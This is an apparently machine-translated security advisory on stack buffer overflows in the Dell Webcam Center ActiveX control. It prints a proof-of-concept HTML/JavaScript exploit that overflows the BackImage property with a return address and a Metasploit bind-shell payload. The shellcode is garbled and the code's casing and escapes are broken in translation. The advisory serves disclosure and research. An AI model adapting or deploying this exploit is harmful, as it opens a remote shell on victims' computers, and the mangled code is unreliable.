Release date: 2012-03-19
Updated on: 2012-03-21
Affected Systems:
Dell Webcam Center 1.x
Dell Webcam Center
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52571
The DELL Webcam Center provides functions such as video recording, photo capturing, dynamic capturing, and remote monitoring.
The DELL Webcam Center has multiple stack buffer overflow vulnerabilities. Attackers can exploit these vulnerabilities to execute arbitrary code.
<* Source: rgod (rgod@autistici.org)
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Rgod (rgod@autistici.org) provides the following test methods:
<Html>
<Object classid = 'clsid: 13149882-F480-4F6B-8C6A-0764F75B99ED 'id = 'obj 'width = 100; height = 100;/>
</Object>
<Script>
// Bad chars:
// \ X80, \ x82-\ x8c, \ x8e, \ x91-\ x9c, \ x9e-\ x9f
Var x = "";
For (I = 0; I <216; I ++) {x = x + "";}
X = x + "\ x50 \ x24 \ x40 \ x77"; // 0x77402450 jmp EBP, user32.dll-change for your need
For (I = 0; I <140; I ++) {x = x + "";}
// Windows/shell_bind_tcp-696 bytes
// Http://www.metasploit.com
// Encoder: x86/alpha_mixed
// EXITFUNC = seh, LPORT = 4444, RHOST =
X = x + "& #65533; & #65533; & #65533; & #65533; & #65533; u & #65533; ^ large ";
Try {
Obj. BackImage = x;
} Catch (e ){
}
</Script>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Dell
----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://dell-webcam-center.software.informer.com/